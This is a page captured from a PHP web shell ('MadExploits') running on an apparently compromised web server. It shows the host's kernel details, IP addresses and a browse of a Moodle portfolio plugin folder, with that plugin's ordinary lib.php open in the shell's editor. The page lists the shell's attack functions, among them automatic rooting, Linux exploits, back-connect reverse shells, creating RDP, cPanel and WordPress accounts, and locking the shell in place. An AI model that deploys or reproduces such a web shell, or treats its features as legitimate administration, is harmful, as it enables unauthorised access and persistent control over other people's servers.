Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.196
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
portfolio /
download /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
file.php
1.5
KB
-rw-r--r--
lib.php
1.51
KB
-rw-r--r--
version.php
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lib.php
<?php require_once($CFG->libdir . '/portfoliolib.php'); require_once($CFG->libdir . '/portfolio/plugin.php'); class portfolio_plugin_download extends portfolio_plugin_pull_base { protected $exportconfig; public static function get_name() { return get_string('pluginname', 'portfolio_download'); } public static function allows_multiple_instances() { return false; } public function expected_time($callertime) { return PORTFOLIO_TIME_LOW; } public function prepare_package() { $files = $this->exporter->get_tempfiles(); if (count($files) == 1) { $this->set('file', array_shift($files)); } else { $this->set('file', $this->exporter->zip_tempfiles()); // this will throw a file_exception which the exporter catches separately. } } public function steal_control($stage) { if ($stage == PORTFOLIO_STAGE_FINISHED) { global $CFG; return $CFG->wwwroot . '/portfolio/download/file.php?id=' . $this->get('exporter')->get('id'); } } public function send_package() {} public function verify_file_request_params($params) { // for download plugin the only thing we need to verify is that // the logged in user is the same as the exporting user global $USER; if ($USER->id != $this->user->id) { return false; } return true; } public function get_interactive_continue_url() { return false; } }
Close